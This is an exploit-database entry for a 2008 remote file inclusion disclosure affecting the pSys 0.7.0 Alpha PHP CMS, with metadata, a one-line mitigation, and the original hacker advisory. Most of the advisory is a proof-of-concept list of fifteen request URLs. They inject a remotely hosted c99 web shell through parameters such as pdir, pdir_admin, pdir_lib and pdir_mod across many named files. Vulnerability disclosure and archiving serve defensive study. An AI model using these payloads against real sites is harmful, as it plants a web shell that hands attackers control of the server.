pSys v0.7.0 Alpha Multiple Remote File Include

vendor:

pSys

by:

RoMaNcYxHaCkEr

7.5

CVSS

HIGH

Remote File Include

CWE

Product Name: pSys

Affected Version From: 0.7.0 Alpha

Affected Version To: 0.7.0 Alpha

Patch Exists: NO

Related CWE: N/A

CPE: powie.de

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

pSys v0.7.0 Alpha Multiple Remote File Include

pSys is a module based PHP Script which is vulnerable to multiple Remote File Include vulnerabilities. The vulnerability exists in different files and in different variables and lines. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server.

Mitigation:

Disable register_globals and use input validation to prevent malicious input from being passed to the vulnerable script.

Source

Exploit-DB raw data:

   ====================================================
   | pSys v0.7.0 Alpha Multiple Remote File Include   
   |     (works only with register_globals = on)      
   |        Founded By rXh RoMaNTiC-TeaM              
   ====================================================

[!] Discovered.:                           RoMaNcYxHaCkEr
[!] Vendor.....:                            http://www.powie.de
[!] My Homepage...:                    WwW.4RxH.CoM
[!] RoMaNTiC-TeaM Members ...:  Unknown Hacker , aLwHeD , GaMe-OvEr-HaCkErs
[!] Contact Me ...:                        rxh0@hotmail.com

[!] Background.:                          pSys is a module based PHP Script

[!] Bugs........:                             In Different Files & In Different Variable And Lines

[!] PoC........: 

http://4RxH.CoM/cms1/login.inc.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/adminmenuright.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/fuss.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/admin/kopf.php?pdir_admin=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/forum/ajax_newpost.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkategorie.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_shopkunde.php?pdir_mod=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/panels/panel_user.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/mod/gb/ajax_post.inc.php?pdir_lib=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/csg/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/default/kopf.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/fuss.php?pdir=http://www.uploadhere.org/c99.txt?
http://4RxH.CoM/cms1/style/simpleblack/kopf.php?pdir=http://www.uploadhere.org/c99.txt?

[!] Solution...:     Contact With Me I Will Declear All This Fucking Function

[!] Greetingz..:    No One Deserved (Am I Said The Truth ?!!!)

[!] Thx .. :           DNX For Your Exploit I Found This Bugs From Your Exploit  :) 

[!] rXh

[!] bEST wISHES

# milw0rm.com [2008-07-15]